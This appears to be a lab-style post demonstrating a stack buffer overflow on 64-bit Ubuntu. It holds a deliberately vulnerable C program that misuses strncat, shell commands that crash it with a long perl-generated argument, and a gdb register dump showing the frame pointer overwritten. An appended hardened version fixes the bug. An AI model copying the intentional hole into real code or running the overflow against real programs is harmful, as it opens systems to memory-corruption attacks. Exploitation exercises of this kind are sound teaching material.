OS : Linux
Distro : Ubuntu 64
Title : AMD64 Wonders
Code "vuln.c" : Thanks to mel @ hitb.
Machine : Seymores AMD 64 Rocks
/*
 * mel@hackinthebox.org - this should be the easy one
 */
#include <stdio.h>    /* BUFSIZ */
#include <string.h>   /* strncat */
#include <strings.h>  /* bzero */

/* Appends up to BUFSIZ bytes of s2 to s1 regardless of how much room
   s1 actually has left: the deliberate bug this post is about. */
void catbuf(char *s1, char *s2)
{
    strncat(s1, s2, BUFSIZ);
}

int main(int argc, char *argv[])
{
    char buf[BUFSIZ + 1];

    bzero(buf, BUFSIZ);
    /* argv[1] is appended twice, so with three or more arguments up to
       2*BUFSIZ bytes land in a BUFSIZ+1 byte stack buffer. */
    if (argc > 2)
        catbuf(buf, argv[1]);
    if (argc > 2)
        catbuf(buf, argv[1]);
    return 0;
}
xwings@64unix:~$ ls
vuln vuln.c
xwings@64unix:~$ ulimit -c unlimited
xwings@64unix:~$ ./vuln `perl -e 'print "A"x 3000'` A
xwings@64unix:~$ ./vuln `perl -e 'print "A"x 3000'` B
xwings@64unix:~$ ./vuln `perl -e 'print "A"x 30000'` B
Segmentation fault (core dumped)
xwings@64unix:~$ gdb -c core ./vuln
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the
GNU General Public License, and you are
welcome to change it and/or distribute copies
of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type
"show warranty" for details.
This GDB was configured as "x86_64-linux-gnu"
...Using host libthread_db library "/lib/libthread_db.so.1".
Core was generated by `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux-x86-64.so.2...done.
Loaded symbols for /lib64/ld-linux-x86-64.so.2
#0 0x0000000000400599 in main ()
(gdb) i r
rax 0x0 0
rbx 0x0 0
rcx 0x7fffffff93cf 140737488327631
rdx 0x0 0
rsi 0x7fffffff9698 140737488328344
rdi 0x0 0
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7fffffff73e8 0x7fffffff73e8
r8 0x7fffffff53d0 140737488311248
r9 0x41 65
r10 0x41 65
r11 0x2aaaaac32ee0 46912497725152
r12 0x4005a0 4195744
r13 0x7fffffff74b0 140737488319664
r14 0x0 0
r15 0x0 0
rip 0x400599 0x400599
eflags 0x10206 66054
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
====================================================
WOW ... Quick Snap Shot :p
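For contrast, a hardened catbuf() as an added example (not part of mel's vuln.c or this post): it derives strncat's limit from the room left in the destination instead of passing BUFSIZ every time, and fill_twice() repeats the post's double append with a guard word placed right after the buffer to confirm nothing spills past it. catbuf_safe and fill_twice are names chosen here; BUFSIZ comes from <stdio.h>.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hardened replacement for the page's catbuf() (added example, not the
 * original code). strncat()'s third argument bounds the bytes APPENDED,
 * not the destination size, so passing BUFSIZ on every call lets two
 * calls write up to 2*BUFSIZ bytes into a BUFSIZ+1 buffer. Here the
 * limit is the room actually left in dst. Returns 1 if src was cut
 * short, 0 if it fit, -1 if dst holds no NUL within dstsize. */
int catbuf_safe(char *dst, size_t dstsize, const char *src)
{
    const char *nul = memchr(dst, '\0', dstsize);
    if (!nul)
        return -1;
    size_t used = (size_t)(nul - dst);
    size_t room = dstsize - used - 1;   /* bytes free before the NUL */
    size_t need = strlen(src);
    strncat(dst, src, room);            /* at most room bytes, then NUL */
    return need > room;
}

/* Mirrors the post's run: append an n-byte run of 'A' twice into a
 * BUFSIZ+1 buffer that has a guard word directly after it. Returns the
 * final string length, or -1 if the guard was clobbered; *truncated is
 * set to 1 if either append had to be cut short. */
long fill_twice(size_t n, int *truncated)
{
    struct { char buf[BUFSIZ + 1]; char guard[8]; } s;
    char *arg = malloc(n + 1);
    if (!arg) return -1;
    memset(arg, 'A', n);
    arg[n] = '\0';
    memset(s.buf, 0, sizeof s.buf);
    memcpy(s.guard, "GUARD!!!", 8);
    int t1 = catbuf_safe(s.buf, sizeof s.buf, arg);
    int t2 = catbuf_safe(s.buf, sizeof s.buf, arg);
    *truncated = (t1 > 0) || (t2 > 0);
    long len = memcmp(s.guard, "GUARD!!!", 8) == 0 ? (long)strlen(s.buf) : -1;
    free(arg);
    return len;
}

int main(void)
{
    int trunc;
    long len = fill_twice(3000, &trunc);
    printf("len=%ld truncated=%d BUFSIZ=%d\n", len, trunc, BUFSIZ);
    return 0;
}
```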